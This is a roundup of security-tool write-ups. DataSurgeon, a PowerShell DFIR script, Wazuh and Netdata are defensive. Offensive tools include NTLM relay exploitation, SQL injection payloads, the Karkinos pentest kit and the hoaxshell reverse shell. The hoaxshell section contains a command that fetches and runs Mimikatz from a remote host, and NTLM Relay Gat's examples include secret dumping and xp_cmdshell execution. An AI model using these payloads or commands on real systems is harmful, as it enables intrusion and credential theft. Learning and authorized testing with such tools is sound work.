• Supports Windows, Linux and MacOS
• Support recursive file analysis within directories
• Plugin Support
• CSV Output

DataSurgeon – Extract Sensitive Information (PII) From Logs Features

DataSurgeon is able to extract:

• Emails
• Files
• Phone numbers
• Credit Cards
• Google API Private Key ID’s
• Social Security Numbers
• AWS Keys
• Bitcoin wallets
• URL’s
• IPv4 Addresses and IPv6 addresses
• MAC Addresses
• SRV DNS Records
• Extract Hashes
  • MD4 & MD5
  • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
  • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
  • MySQL 323, MySQL 41
  • NTLM
  • bcrypt

To learn how to manage plugins please follow the guide here.

• Emails
• Phone numbers
• Social Security Numbers

• Credit Cards
• Bitcoin wallets

• URL’s
• IPv4 Addresses and IPv6 addresses
• MAC Addresses
• SRV DNS Records

• Google API Private Key ID’s
• AWS Keys
• CVE Numbers (PLUGIN)

• Files
• Windows Registries (PLUGIN)

• MD4 & MD5
• SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
• SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
• MySQL 323, MySQL 41
• NTLM
• bcrypt

The quick installer can also be used to update DataSurgeon.

Install Rust and Github then RESTART YOUR TERMINAL.

read -p "Would you like to add 'ds' to your local bin? This will make 'ds' executable from any location in your terminal. (y/n) " response && wget -q -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash -s -- "$response"

Enter the line below in an elevated powershell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Here I use wget to make a request to stackoverflow then I forward the body text to ds . The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra html). Then the result of is sent to uniq which removes any non unique files found. Ig you wanted you can remove the warning message at the top ‘Reading standard input..’ by using -S.

$ wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq

Here I am pulling all mac addresses found in autodeauth’s log file using the -m query. The --hide option will hide the identifer string infront of the results. In this case ‘mac_address: ‘ is hidden from the output. The -T option is used to check the same line multiple times for matches. Normallly when a match is found the tool moves on to the next line rather then checking again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

You can use the --directory option to read all files in the specified directory recursively. The -D option is used to display the filename where the match was found. -l or --line is used to display the line number the content was found on.

$ ds --directory test_dir/ -Dl

To output your results to a CSV file, use the -o option followed by the name of the file you want to save your data to. The -D and -X are supported. The format is: ds -o <FILENAME>.csv (.csv is needed).

 $ wget -qO - https://www.stackoverflow.com | ds -o output.csv -C

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. Its also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was ran 3 times and the average time was recorded.

Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
Ram         12.0 GB (11.9 GB usable)

The post DataSurgeon – Extract Sensitive Information (PII) From Logs appeared first on Tech Chronicles.

Designed for both novices and experienced cybersecurity professionals, this tool streamlines the process of identifying and exploiting weaknesses in network security.

With its user-friendly interface and powerful features, NTLM Relay Gat serves as a critical asset in the toolkit of ethical hackers and penetration testers aiming to enhance their network defense strategies.

Description

NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.

Features

• Multi-threading Support: Utilize multiple threads to perform actions concurrently.
• SMB Shares Enumeration: List available SMB shares.
• SMB Shell Execution: Execute a shell via SMB.
• Secrets Dumping: Dump secrets from the target.
• MSSQL Database Enumeration: List available MSSQL databases.
• MSSQL Command Execution: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.

Prerequisites

Before you begin, ensure you have met the following requirements:

• proxychains properly configured with ntlmrelayx SOCKS relay port
• Python 3.6+

Installation

To install NTLM Relay Gat, follow these steps:

1. Ensure that Python 3.6 or higher is installed on your system.
2. Clone NTLM Relay Gat repository:

git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat

Install dependencies, if you don’t have them installed already:

pip install -r requirements.txt

NTLM Relay Gat is now installed and ready to use.

Usage

To use NTLM Relay Gat, make sure you’ve got relayed sessions in ntlmrelayx.py‘s socks command output and that you have proxychains configured to use ntlmrelayx.py‘s proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:

# List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10

# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets

# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs

# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'

The post NTLM Relay Gat – Automating Exploitation Of NTLM Relay Vulnerabilities appeared first on Tech Chronicles.

From extracting information from social media accounts to conducting phone and IP lookups, H4X-Tools offers a wide array of functionalities to aid researchers, developers, and security enthusiasts alike.

Explore its features, installation process, and community-driven development in this article. Toolkit for scraping, OSINT and more.

Submit feature requests and bugs in the issues tab.

If you want to help with the development, follow the instructions in contributing and simply open a pull request. You can also donate to keep the project alive and me motivated!

Current Tools

Warning

Some tools might not work on Windows systems.

Note

-IG Scrape requires you to log in, in order to use it.

-SMS Bomber only works with US numbers.

-You might get rate limited after using some of the tools for too long.

Installation

I’ll upload already built executables to the releases tab, but I’d recommend installing the tool manually by following the instructions below. This way you also get the freshest version.

Setup

Important

Make sure you have Python and Git installed.

View the wiki page for more detailed tutorial.

Linux

1. Clone the repo git clone https://github.com/vil/h4x-tools.git
2. Change directory cd h4x-tools
3. Run sh setup.sh in terminal to install the tool.

Windows

1. Clone the repo git clone https://github.com/vil/h4x-tools.git
2. Change directory cd h4x-tools
3. Run the setup.bat file.

Setup files will automatically build the tool as an executable. You can also run the tool using python h4xtools.py in the terminal.

Also, dependencies can be installed manually using pip install -r requirements.txt.

The post H4X-Tools – Designed for Scraping, OSINT and Beyond appeared first on Tech Chronicles.

The following Incident Response scripts are included:

• DFIR Script: Collects all items as listed in section DFIR Script.
• CollectWindowsEvents: Collects all Windows events and outputs it as CSV.
• CollectWindowsSecurityEvents: Collects all Windows security events and outputs it as CSV.
• CollectPnPDevices: Collects all Plug and Play devices, such as USB, Network and Storage.
• DumpLocalAdmins: Returns all local admins of a device.
• LastLogons – List the last N successful logins of a device.
• ListInstalledSecurityProducts – List the installed security products and their status.
• ListDefenderExclusions – List the FolderPath, FileExtension, Process and IP exclusions that are defined.

DFIR Script – Extracted Artefacts

The DFIR script collects information from multiple sources and structures the output in the current directory in a folder named ‘DFIR-hostname-year-month-date’.

This folder is zipped at the end, so that folder can be remotely collected. This script can also be used within Defender For Endpoint in a Live Response session (see below).

The DFIR script collects the following information when running as normal user:

• Local IP Info
• Open Connections
• Aautorun Information (Startup Folder & Registry Run keys)
• Active Users
• Local Users
• Connections Made From Office Applications
• Active SMB Shares
• RDP Sessions
• Active Processes
• Active USB Connections
• Powershell History
• DNS Cache
• Installed Drivers
• Installed Software
• Running Services
• Scheduled Tasks
• Browser history and profile files

For the best experience run the script as admin, then the following items will also be collected:

• Windows Security Events
• Remotely Opened Files
• Shadow Copies
• MPLogs
• Defender Exclusions

SIEM Import Functionality

The forensic artefacts are exported as CSV files, which allows responders to ingest them into their tooling. Some example tools in which you can ingest the data are Sentinel, Splunk, Elastic or Azure Data Explorer. This will allow you to perform filtering, aggregation and visualisation with your preferred query language.

The folder CSV Results (SIEM Import Data) includes all the CSV files containing the artefacts, the folder listing is shown below.

Name
----
ActiveUsers.csv
AutoRun.csv
ConnectedDevices.csv
DefenderExclusions.csv
DNSCache.csv
Drivers.csv
InstalledSoftware.csv
IPConfiguration.csv
LocalUsers.csv
NetworkShares.csv
OfficeConnections.csv
OpenTCPConnections.csv
PowerShellHistory.csv
Processes.csv
RDPSessions.csv
RemotelyOpenedFiles.csv
RunningServices.csv
ScheduledTasks.csv
ScheduledTasksRunInfo.csv
SecurityEvents.csv
ShadowCopy.csv
SMBShares.csv

DFIR Commands

The DFIR Commands page contains invidividual powershell commands that can be used during your incident response process. The follwing catagories are defined:

• Connections
• Persistence
• Windows Security Events
• Processes
• User & Group Information
• Applications
• File Analysis
• Collect IOC Information

Windows Usage

The script can be excuted by running the following command.

.\DFIR-Script.ps1

The script is unsigned, that could result in having to use the -ExecutionPolicy Bypass to run the script.

Powershell.exe -ExecutionPolicy Bypass .\DFIR-Script.ps1

DFIR Script | Defender For Endpoit Live Response Integration

It is possible to use the DFIR Script in combination with the Defender For Endpoint Live Repsonse. Make sure that Live Response is setup (See DOCS). Since my script is usigned a setting change must be made to able to run the script.

There is a blog article available that explains more about how to leverage Custom Script in Live Response: Incident Response Part 3: Leveraging Live Response

To run unsigned scripts live Response:

• Security.microsoft.com
• Settings
• Endpoints
• Advanced Features
• Make sure that Live Response is enabled
• If you want to run this on a server enable live resonse for servers
• Enable Live Response unsigened script execution

Execute script:

• Go to the device page
• Initiate Live Response session
• Upload File to library to upload script
• After uploading the script to the library execute: run DFIR-script.ps1 to start the script.
• Execute getfile DFIR-DeviceName-yyyy-mm-dd to download the retrieved artifacts to your local machine for analysis.

Docs

• Microsoft Documentation Live Response
• DFE User permissions
• Defender For Endpoint Settings Live Response

The post Powershell Digital Forensics And Incident Response (DFIR) – Leveraging Scripts For Effective Cybersecurity appeared first on Tech Chronicles.

It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency.

Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.

Key Features

• Time-Based Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
• Multi-Threaded Scanning: Offers faster scanning capabilities through concurrent processing.
• Discord Notifications: Sends alerts via Discord webhook for detected vulnerabilities.
• False Positive Checks: Implements response time analysis to differentiate between true positives and false alarms.
• Custom Payload and Headers Support: Allows users to define custom payloads and headers for targeted scanning.

Installation

git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt

Usage

This will display help for the tool. Here are all the options it supports.

ubuntu:~/sqlisniper$ ./sqlisniper.py -h


███████╗ ██████╗ ██╗     ██╗    ███████╗███╗   ██╗██╗██████╗ ███████╗██████╗
██╔════╝██╔═══██╗██║     ██║    ██╔════╝████╗  ██║██║██╔══██╗██╔════╝██╔══██╗
███████╗██║   ██║██║     ██║    ███████╗██╔██╗ ██║██║██████╔╝█████╗  ██████╔╝
╚════██║██║▄▄ ██║██║     ██║    ╚════██║██║╚██╗██║██║██╔═══╝ ██╔══╝  ██╔══██╗
███████║╚██████╔╝███████╗██║    ███████║██║ ╚████║██║██║     ███████╗██║  ██║
╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝    ╚══════╝╚═╝  ╚═══╝╚═╝╚═╝     ╚══════╝╚═╝  ╚═╝

                            -: By Muhammad Danial :-

usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PAYLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
                     [--threads THREADS]

Detect SQL injection by sending malicious queries

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL for the target
  -r URLS_FILE, --urls_file URLS_FILE
                        File containing a list of URLs
  -p, --pipeline        Read from pipeline
  --proxy PROXY         Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
  --payload PAYLOAD     File containing malicious payloads (default is payloads.txt)
  --single-payload SINGLE_PAYLOAD
                        Single payload for testing
  --discord DISCORD     Discord Webhook URL
  --headers HEADERS     File containing headers (default is headers.txt)
  --threads THREADS     Number of threads

Running SqliSniper

Single Url Scan

The url can be provided with -u flag for single site scan

./sqlisniper.py -u http://example.com

File Input

The -r flag allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.

./sqlisniper.py -r url.txt

Piping URLs

The SqliSniper can also worked with the pipeline input with -p flag

cat url.txt | ./sqlisniper.py -p

The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

Scanning with custom payloads

By default the SqliSniper use the payloads.txt file. However --payload flag can be used for providing custom payloads file.

./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.

ubuntu:~/sqlisniper$ cat payloads.txt 
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z

Scanning with Single Payloads

If you want to only test with the single payload --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%

./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

Scanning Custom Header

Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.

ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1

Sending Discord Alert Notifications

SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

./sqlisniper.py -r url.txt --discord <web_hookurl>

Multi-Threading

Threads can be defined with --threads flag

 ./sqlisniper.py -r url.txt --threads 10

Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection it is recommended to use lower thread for more accurate detection.

Usage of this tool for attacking targets without prior mutual consent is strictly prohibited. It is the end user’s responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

The post SqliSniper – Enhancing Web Security By Detecting SQL Injection Vulnerabilities With Python appeared first on Tech Chronicles.

Karkinos is a light-weight ‘Swiss Army Knife’ for penetration testing and/or hacking CTF’s. Currently, Karkinos offers the following:

• Encoding/Decoding characters
• Encrypting/Decrypting text or files
• 3 Modules
• Cracking and generating hashes

Disclaimer

This tool should be used on applications/networks that you have permission to attack only. Any misuse or damage caused will be solely the users’ responsibility.

More: https://github.com/helich0pper/Karkinos

Dependencies

• Any server capable of hosting PHP; tested with Apache Server
• Tested with PHP 7.4.9
• Tested with Python 3.8
  Make sure it is in your path as:
  Windows: python
  Linux: python3
  If it is not, please change the commands in includes/pid.php
• pip3
• Raspberry Pi Zero friendly (crack hashes at your own risk)

Installing

This installation guide assumes you have all the dependencies. A Wiki page with troubleshooting steps can be found here.

Linux/BSD

1. git clone https://github.com/helich0pper/Karkinos.git
2. cd Karkinos
3. pip3 install -r requirements.txt
4. cd wordlists && unzip passlist.zip You can also unzip it manually using file explorer. Just make sure passlist.txt is in wordlists directory.
5. Make sure you have write privileges for db/main.db
6. Enable extension=mysqli in your php.ini file.
   If you don’t know where to find this, refer to the PHP docs. Note: MySQLi is only used to store statistics.
7. Thats it! Now just host it using your preferred web server or run: php -S 127.0.0.1:8888 in the Karkinos directory.Important: using port 5555, 5556, or 5557 will conflict with the Modules
   If you insist on using these ports, change the PORT value in:

• • /bin/Server/app.py Line 87
  • /bin/Busting/app.py Line 155
  • /bin/PortScan/app.py Line 128

Windows

1. git clone https://github.com/helich0pper/Karkinos.git
2. cd Karkinos
3. pip3 install -r requirements.txt
4. cd wordlists && unzip passlist.zip
   You can also unzip it manually using file explorer. Just make sure passlist.txt is in wordlists directory.
5. Make sure you have write privileges for db/main.db
6. Enable extension=mysqli.dll in your php.ini file.
   If you don’t know where to find this, refer to the PHP docs. Note: MySQLi is only used to store statistics
7. Thats it! Now just host it using your preferred web server or run: php -S 127.0.0.1:8888 in the Karkinos directory.Important: using port 5555, 5556, or 5557 will conflict with the Modules
   If you insist on using these ports, change the PORT value in:

• /bin/Server/app.py Line 87
• /bin/Busting/app.py Line 155
• /bin/PortScan/app.py Line 128

Home Menu

Landing page and quick access menu.

User stats are displayed here. Currently, the stats recorded are only the total hashes and hash types cracked successfully.

Encoding/Decoding

This page allows you to encode/decode in common formats (more may be added soon)

Encrypt/Decrypt

Encrypting and decrypting text or files is made easy and is fully trusted since it is done locally.

Reverse Shell Handling

Reverse shells can be captured and interacted with on this page.

Create a listener instance

Configure the listener

Start the listener and capture a shell

Full reverse shell handling demo:

Directory and File Busting

Create an instance

Configure it

Start scanning

Full Directory and File Busting demo:

Port Scanning

Launch the scanner

Configure it

Start scanning

Full Port Scanning Demo:

Generating Hashes

Karkinos can generate commonly used hashes such as:

• MD5
• SHA1
• SHA256
• SHA512

Cracking Hashes

Karkinos offers the option to simultaneously crack hashes using a built-in wordlist consisting of over 15 million common and breached passwords. This list can easily be modified and/or completely replaced.

The post Karkinos – Penetration Testing and Hacking CTF’s Swiss Army Knife appeared first on Tech Chronicles.

Containers out-of-the-box do not provide security monitoring. Therefore, it is important to have a comprehensive view of what is happening in runtime. This ensures that containers operate smoothly without security issues that can easily affect other containers and the entire infrastructure. Some security aspects to continuously watch out for when running Docker containers are:

• Container management: Docker container management involves supervising actions performed on a container to keep it running smoothly. Threat actors can get hold of containers and perform malicious activities such as viewing critical content, opening ports, creating, stopping or even destroying containers. Ability to distinguish unusual Docker events can be challenging. Observing these actions in near real-time as they occur can help organizations running Docker containers make better informed decisions.

• Container resource consumption: Monitoring the performance of a container provides insight into its resource utilization. Some core resources include CPU, memory, disk, and network traffic. With resource monitoring, organizations can track container resource consumption and set measures to increase efficiency. These actions prevent imbalances of container resources in Dockerized infrastructures. Additionally, it allows better visibility of infrastructures in the event of a security incident.

• Container health: Container health checks aid an organization in knowing its workload availability. The health status of a container is different from its actual state of operation. For example, a container can run while a web server running in the container may be down and unable to handle requests. This can be due to an attack that, if not monitored, can persist and cause damage to an organization. Monitoring the health status of a container helps to reduce an attack surface and prevent anomalies in the container.

Organizations need to identify and resolve threats quickly and proactively to avoid risks of compromise. For this, keeping track of the above criteria is indispensable and can be accomplished through the use of security monitoring solutions.

Using Wazuh for container monitoring

Wazuh is an open source security platform with unified XDR and SIEM capabilities. Its architecture comprises the Wazuh central components (server, indexer, and dashboard) and a universal agent. The solution provides protection for devices in clouds and on-premises infrastructures. Wazuh has many features ranging from container monitoring, file integrity monitoring, vulnerability detection, security configuration assessment, and more. Wazuh is multi-platform and expands its flexibility through integration with other security solutions.

Figure 1 below shows an example of real-time monitoring of Docker containers using Wazuh.

Figure 1: Real-time monitoring of Docker containers using Wazuh

For the use cases below, the Wazuh agent is installed on endpoints running Docker containers. The agent collects security and runtime data from the containers and forwards it to the Wazuh server for log analysis, correlation, and alerting.

Monitoring container events

Wazuh has a Docker module that communicates with the Docker Engine API to gather information on Docker containers. The only configuration necessary is to enable the Docker listener module to allow us to monitor Docker events. The Wazuh dashboard in Figure 2 below shows an example of detected container events in a Docker environment.

Figure 2: Docker events detected in a Docker environment

Monitoring container resource utilization

Wazuh can be used to monitor the performance of Docker containers in an endpoint.  The Wazuh command monitoring module allows you to monitor the output of specific commands and trigger alerts accordingly. This gives organizations a clear view of the container for abnormal activities. The Wazuh dashboard in Figure 3 below shows the CPU, memory, and network traffic consumption of containers in an endpoint.

Figure 3: Resource consumption of containers in a Docker environment

Monitoring container health

The Wazuh command monitoring module is used to monitor the health status of containers in Dockerized environments. Figure 4 below shows the health status of containers running on an endpoint.

Figure 4: Health status of containers in a Docker environment

Conclusion

Robust monitoring and easy debugging are key factors for container security. This ensures complete coverage of metrics and the events happening in your Dockerized container infrastructures. We have seen how Wazuh facilitates and improves an organization’s visibility through its container security monitoring capabilities. Visit this documentation to get a detailed explanation of how to perform container monitoring with Wazuh.

Wazuh is free to use, easy to deploy, and has a continuously growing community that supports thousands of users. To get started with Wazuh, visit the Quickstart installation guide and explore the features it provides.

The post Using Wazuh for Docker Container Monitoring appeared first on Tech Chronicles.

Purpose

hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates its own PowerShell payload and it supports encryption (ssl).

So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).

More: https://github.com/t3l3machus/hoaxshell

Video Presentation

Screenshots 

Find more screenshots here.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

sudo python3 hoaxshell.py -s <your_ip>

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

sudo python3 hoaxshell.py -s <your_ip> -g

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

The post hoaxshell – An unconventional Windows reverse shell appeared first on Tech Chronicles.

Features

• Machine-in-the-middle (MITM) HTTP proxy, with logs and advanced search
• HTTP client for manually creating/editing requests, and replay proxied requests
• Scope support, to help keep work organized
• Easy-to-use web based admin interface
• Project based database storage, to help keep work organized

Hetty is in early development. Please see the backlog for details.

Community​

Join the Hetty Discord server.

Documentation

Read the docs.

Installation

The quickest way to install and update Hetty is via a package manager:

macOS

brew install hettysoft/tap/hetty

LINUX 

sudo snap install hetty

WINDOWS

scoop bucket add hettysoft https://github.com/hettysoft/scoop-bucket.git
scoop install hettysoft/hetty

Alternatively, you can download the latest release from GitHub for your OS and architecture, and move the binary to a directory in your $PATH. If your OS is not available for one of the package managers or not listed in the GitHub releases, you can compile from source (link?) or use a Docker image (link?).

Run​

Once installed, start Hetty from the command line:

hetty

When invoked without any options, this:

• Creates a root CA certificate and private key, stored on disk at ~/.hetty/
• Creates a BadgerDB database, stored on disk at ~/.hetty/db/
• Runs an HTTP server that listens on 0.0.0.0:8080, used for proxying and serving the admin interface

You should see the following console output:

2022/03/01 11:09:15 INFO [main] Hetty (v0.5.1) is running on :8080 ...2022/03/01 11:09:15 INFO [main] Get started at http://localhost:8080

hetty --chrome

Copy to Sender​

Use the “copy” icon next to any log entry to copy this request to the Sender module, allowing you to edit and resend the HTTP request:

Edit & send request​

Browse to the Sender module via the vertical menu bar on the left.

At the bottom of the screen, click the request we just copied from the Proxy logs.

Now you can edit the method, URL, request headers and body of the request. Every time you click Send, a new request is sent and recorded in the history pane at the bottom of the screen.

What’s next?​

You should now be up and running with Hetty! Check out the guides for more detailed feature documentation.

Support​

Use issues for bug reports and feature requests, and discussions for questions and troubleshooting.

Community​

Join the Hetty Discord server.

Contributing​

Want to contribute? Great! Please check the Contribution Guidelines for details.

The post Hetty – An HTTP Toolkit For Security Research appeared first on Tech Chronicles.

Netdata’s distributed, real-time monitoring Agent collects thousands of metrics from systems, hardware, containers, and applications with zero configuration. It runs permanently on all your physical/virtual servers, containers, cloud deployments, and edge/IoT devices, and is perfectly safe to install on your systems mid-incident without any preparation.

You can install Netdata on most Linux distributions (Ubuntu, Debian, CentOS, and more), container platforms (Kubernetes clusters, Docker), and many other operating systems (FreeBSD, macOS). No sudo required.

Netdata is designed by system administrators, DevOps engineers, and developers to collect everything, help you visualize metrics, troubleshoot complex performance problems, and make data interoperable with the rest of your monitoring stack.

People get addicted to Netdata. Once you use it on your systems, there’s no going back! You’ve been warned…

Features

Here’s what you can expect from Netdata:

• 1s granularity: The highest possible resolution for all metrics.
• Unlimited metrics: Netdata collects all the available metrics—the more, the better.
• 1% CPU utilization of a single core: It’s unbelievably optimized.
• A few MB of RAM: The highly-efficient database engine stores per-second metrics in RAM and then “spills” historical metrics to disk long-term storage.
• Minimal disk I/O: While running, Netdata only writes historical metrics and reads error and access logs.
• Zero configuration: Netdata auto-detects everything, and can collect up to 10,000 metrics per server out of the box.
• Zero maintenance: You just run it. Netdata does the rest.
• Stunningly fast, interactive visualizations: The dashboard responds to queries in less than 1ms per metric to synchronize charts as you pan through time, zoom in on anomalies, and more.
• Visual anomaly detection: Our UI/UX emphasizes the relationships between charts to help you detect the root cause of anomalies.
• Scales to infinity: You can install it on all your servers, containers, VMs, and IoT devices. Metrics are not centralized by default, so there is no limit.
• Several operating modes: Autonomous host monitoring (the default), headless data collector, forwarding proxy, store and forward proxy, central multi-host monitoring, in all possible configurations. Use different metrics retention policies per node and run with or without health monitoring.

Netdata works with tons of applications, notifications platforms, and other time-series databases:

• 300+ system, container, and application endpoints: Collectors autodetect metrics from default endpoints and immediately visualize them into meaningful charts designed for troubleshooting. See everything we support.
• 20+ notification platforms: Netdata’s health watchdog sends warning and critical alarms to your favorite platform to inform you of anomalies just seconds after they affect your node.
• 30+ external time-series databases: Export resampled metrics as they’re collected to other local- and Cloud-based databases for best-in-class interoperability.

Want to leverage the monitoring power of Netdata across entire infrastructure? View metrics from any number of distributed nodes in a single interface and unlock even more features with Netdata Cloud.

Get Netdata

To install Netdata from source on most Linux systems (physical, virtual, container, IoT, edge), run our one-line installation script. This script downloads and builds all dependencies, including those required to connect to Netdata Cloud if you choose, and enables automatic nightly updates and anonymous statistics.

wget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh

docker run -d --name=netdata \
  -p 19999:19999 \
  -v netdataconfig:/etc/netdata \
  -v netdatalib:/var/lib/netdata \
  -v netdatacache:/var/cache/netdata \
  -v /etc/passwd:/host/etc/passwd:ro \
  -v /etc/group:/host/etc/group:ro \
  -v /proc:/host/proc:ro \
  -v /sys:/host/sys:ro \
  -v /etc/os-release:/host/etc/os-release:ro \
  --restart unless-stopped \
  --cap-add SYS_PTRACE \
  --security-opt apparmor=unconfined \
  netdata/netdata

The post Netdata – Real-time Performance Monitoring appeared first on Tech Chronicles.